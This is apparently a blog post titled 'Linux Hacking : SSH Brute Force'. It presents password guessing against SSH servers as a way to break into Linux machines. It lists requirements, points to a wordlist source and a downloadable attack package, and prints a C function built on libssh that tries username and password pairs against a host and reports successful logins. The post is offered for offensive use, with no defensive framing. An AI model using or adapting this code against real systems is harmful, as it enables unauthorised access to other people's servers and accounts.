Linux Hacking : SSH Brute Force
if you have read my articles about hacking linux via telnet brute force using telnet_crack.pl there is one characteristic, it has to be brute force one. i think this all the basic of metasploit works. it brute force way. and since linux application not have so many vulnerable like windows base. ok, now i’ll post about hacking linux box using ssh brute force attack.and good news that i’ll share the ssh brute foce packages here. even it is a old stuff i think this technique will keep used. the one problem is the word list for password brute force has to be the good one.
–[1]– Requirement
- libssh-0.1.tgz
- gcc compiler
- unix box
–[2]– brute force concept
like i said before this is brute force attack type.so what the code will do is just password guessing from the password list you have. you can download password list from my telnet_crack.pl post. i take it from http://www2.packetstormsecurity.org/ or you can make by your self. i’ll give you the complete packages here. it ’s include the code , libssh-0.1.tgz , example for the password list. and the last is of course the readme.
–[3]– Code Preview
#include <libssh/libssh.h>
#include <libssh/sftp.h>
#define PORT 22
void checkauth(char *user, char *password, char *host)
{
SSH_SESSION *session;
SSH_OPTIONS *options;
int argc=1;
char *argv[]={”none”};
options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
options_set_port(options,PORT);
session=ssh_connect(options);
if(!session) return ;
if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
{
printf(”%s:%s:%s -> BaD Password\n”,user,password,host);
ssh_disconnect(session);
return;
}else{
printf(”%sOk.TRY This : %s:%s:%s\n”,warn,user,password,host);
}
}
i hope just by read this code you can undestand how this code works. i think this enough. you can download the ssh brute force package below
it taken from www.kecoak-elektronik.net
Recent Comments